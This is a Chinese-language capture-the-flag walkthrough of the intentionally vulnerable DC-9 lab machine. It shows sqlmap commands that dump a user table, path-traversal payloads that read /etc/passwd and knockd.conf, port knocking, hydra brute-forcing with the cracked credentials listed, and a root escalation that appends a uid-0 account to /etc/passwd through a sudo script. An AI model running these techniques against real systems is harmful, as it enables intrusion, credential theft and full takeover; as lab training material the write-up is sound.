环境准备
DC-9靶机链接:百度网盘 请输入提取码
提取码:arn4
虚拟机网络链接模式:桥接模式
攻击机系统:kali linux 2021.1
信息搜集
1.探测目标靶机ip
arp-scan -l
2.探测目标靶机开放端口和服务情况
nmap -p- -A -T4 192.168.166.137
22端口关闭中 可能有knocked服务
漏洞利用
1.访问页面
2.页面有一个搜索框,尝试SQL注入
3.SQL注入漏洞
1>抓个包,把抓到的信息写进一个文本里,sqlmap跑一下
sqlmap -r wei.txt --current-db
2>sqlmap -r wei.txt -D Staff --tables
3>sqlmap -r wei.txt -D Staff -T Users --columns
4> sqlmap -r wei.txt -D Staff -T Users -C Username,Password --dump
5>sqlmap -r wei.txt --is-dba
4.文件读取漏洞
1>用爆破出的用户名密码登录
admin transorbital1
点击manage 根据他的有意思猜测可能有文件读取漏洞,有点侮辱智商。
2>?file=../../../../etc/passwd 成功查询到passwd文件
3>把用户名写进user.txt
root daemon bin sys sync games man lp mail news uucp proxy www-data backup listirc gnats nobody _apt systemd-timesync systemd-network systemd-resolve messagebus sshd ystemd-coredump mysql marym julied fred barneyr tomc jerrym wilmaf bettyr chandlerb joeyt rachelg rossg monicag phoebeb scoots janitor janitor2
4>这里尝试读取knockd服务的配置文件
?file=../../../../../etc/knockd.conf
5.依次敲击 7469 8475 9842 端口实现敲门操作 ,再次用nmap发现ssh开放
6.用hydra 爆破用户名密码
login:fredf password:B4-Tru3-001
login:chandlerb password: UrAG0D!
权限提升
1.ssh登录
2.sudo -l 发现 /opt目录下可以提权
查看test权限可读可执行 运行一下 提示用test.py
find / -name "test.py" 2>/dev/null //查找test.py文件位置
3.cd /opt/devstuff 去看下这个py脚本
4.openssl passwd -1 -salt 123456 //给密码加盐
echo 'test:$1$test$at615QShYKduQlx5z9Zm7/:0:0::/root:/bin/bash' >> /tmp/test
5.sudo ./test /tmp/test /etc/passwd
提权成功,拿下!!!